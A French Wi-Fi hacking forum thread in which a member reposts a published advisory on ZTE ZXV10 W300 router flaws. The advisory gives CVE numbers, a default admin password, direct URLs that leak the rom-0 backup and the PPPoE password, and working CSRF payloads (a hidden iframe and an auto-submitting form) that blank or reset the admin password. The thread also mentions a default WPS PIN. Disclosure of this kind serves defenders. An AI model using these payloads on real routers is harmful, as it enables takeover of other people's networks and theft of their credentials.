Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 19-06-2014 09:54:25

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Escalada de privilèges sur ZTE WXV10 W300

Dans la série " 500 millions de chinois, mon ZTE et moi"; un petit exploit tout frais en provenance de packet storm et publié par Osanda Malith : ZTE WXV10 W300 Disclosure / CSRF / Default

  Voici donc quelques unes des façons connues à ce jour pour obtenir les privilèges d'administrateurs une fois connecté au réseau local.

1 - apparemment il y un utilisateur "admin" permanent, le mot de passe par défaut est "admin"
Bien sur on peut changer le mot de passe mais pourquoi ne pas permettre de changer le nom d'administrateur? Une attaque de dictionnaire sur deux inconnues enlacées c'est de la folie pure, casser un seul pass est beaucoup plus envisageable... De toute façon as besoin de se prendre la tête car vous pouvez:


2 - accéder par http à la page paserelle + rom-0

http://192.168.1.1/rom-0

 
  Comme par magie vous pouvez obtenir le fichier de backup où de l'information critique ( comme le password ) est conservée et déchiffrable grâce au ZTE, TP-Link, ZynOS, Huawei rom-0 Configuration Decompressor publié par notre cher Osanda il y a quelque jours...

  Si vous avez du ZTE, huawei ou TP-Link sous la main c'est le moment de jetter un coup d'oeil ... wink
 
 
3 - Mots de passes PPPoE/PPPoA dans tc2wanfun.js

En examinant le code source des cadres de la page de conf, celui sous "Internet setup" exécute une fonction : "function doLoad()"
celle-ci appelle un fichier externe,

<script language="javascript" src="/basic/tc2wanfun.js"></script>

dans le  fichier js le mot de passe est conservé jlorsqu'un utilisqteur légitime s'authentifie jusqu'au prochain restart.
Bref, une foi que l'admin s'authentifie le password est aussi conservé là.

http://192.168.1.1/basic/tc2wanfun.js

  4 - Enfin la méthode brutale, vous pouvez modifier le password en demandant /Forms/tools_admin_1 à l'aide d'une requête GET contenant une authetification http basique.
  Il est donc demandé à l'utilisateur victime de rentrer ses identifiants et se faisant ceux-ci sont reconfiguré sans valeur attribuée ( en blanc )
 

  5 - et pour mettre l'estocade, le W300 n'a pas de solution ( contrairement au tp-link ) au problème de vulnérabilité à des DoS ( révélé préalablement par Osanda : https://osandamalith.wordpress.com/2014 … pager-dos/, http://www.osvdb.org/show/osvdb/108076 etc..)


voici l'exploit :

# Exploit Title:   ZTE WXV10 W300 Multiple Vulnerabilities
# Date:       17-05-2014
# Server Version:   RomPager/4.07 UPnP/1.0
# Tested Routers:   ZTE ZXV10 W300
# Firmware:     W300V1.0.0a_ZRD_LK
# ADSL Firmware:   FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0
# Tested on:     Kali Linux x86_64
# Exploit Author:   Osanda Malith Jayathissa (@OsandaMalith)
# Original write-up:https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/


#1| Default Password Being Used (CVE-2014-4018)
------------------------------------------------
In ZTE routers the username is a constant which is "admin" and the password by default is "admin"

#2| ROM-0 Backup File Disclosure (CVE-2014-4019)
-------------------------------------------------
The rom-0 backup file contains sensitive information such as the router password. 
There is a disclosure in which anyone can download that file without any authentication by a simple GET request.

POC:
http://192.168.1.1/rom-0

You can find the router password using my rom-0 configuration decompressor.  
http://packetstormsecurity.com/files/127049/ZTE-TP-Link-ZynOS-Huawei-rom-0-Configuration-Decompressor.html

#3| PPPoE/PPPoA Password Disclosure in tc2wanfun.js (CVE-2014-4154)
---------------------------------------------------------------------
If you look at the frame source in the "Internet" tab under the "Interface Setup" you can see this doLoad function in line 542 which fetches the password and displays it there. The frame URI is /basic/home_wan.htm.

function doLoad() {
  var value = document.forms[0].wanTypeRadio[2].checked;
  doEnable();
  QosCheck();
  WANChkIdleTimeT();
  if (value)
  pppStaticCheck();
  LockWhenPVC0();
  LockPVC();
  if(document.forms[0].wan_PPPPassword != null)
  {
    document.forms[0].wan_PPPPassword.value = pwdppp;
  }
}

The "pwdpp" is loaded from an external file which you can see at the bottom of the page.
<script language="javascript" src="/basic/tc2wanfun.js"></script>
Once the user authenticates the router till another successful restart the password is written in that external JS file.

POC:
http://192.168.1.1/basic/tc2wanfun.js

#4| Admin Password Manipulation CSRF (CVE-2014-4155)
-----------------------------------------------------
You can change the password to blank by requesting /Forms/tools_admin_1 with a GET requesting containing HTTP basic authentication.
POC:
<iframe src="http://192.168.1.1/Forms/tools_admin_1" width="0" height="0"></iframe>
If you send something like above to the victim, he will be prompted for the login and once he enter his credentials, his password will be immediately changed to a blank password.
Ofcourse since there is no XSRF token in the request you change the password as you wish.
POC:
<html>
  <body>
    <form name="exploit" action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
      <input type="hidden" name="uiViewTools_Password" value="your_passwd" />
      <input type="hidden" name="uiViewTools_PasswordConfirm" value="your_passwd" />
      <script>document.exploit.submit(); </script>
    </form>
  </body>
</html>

#5| Denial of Service
-----------------------
You can see my previous post about this vulnerability and the exploit.

https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
http://www.osvdb.org/show/osvdb/108076
http://packetstormsecurity.com/files/127076/ZTE-TP-Link-RomPager-Denial-Of-Service.html
http://www.exploit-db.com/exploits/33737


  Ah, les routeurs ZTE...
...Ils doivent pas coûter trop chers car ils sont très en vogue en ce moment même en espagne, jazztell et téléfonica se disputent le marché de la fibre optique et les deux utilisent deux modèles ZTE le ZXHN_H108N et le ZXHN H298N.

Dans les deux cas avec PIN WPS 12345670 activé par défaut.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 20-06-2014 17:17:53

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Escalada de privilèges sur ZTE WXV10 W300

En fait, à la base ces produits n'étaient pas destinés à la production en série. Ils avaient été créés pour un challenge Rootme, ou les participants avaient une heure pour trouver le plus grand nombre de backdoors. Mais bon finalement ils l'ont vendu tel quel, après tout à quoi ça sert d'avoir un routeur sécurisé de toute façon? lol

Hors Ligne

#3 21-06-2014 12:00:08

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Escalada de privilèges sur ZTE WXV10 W300

lol

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.024 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]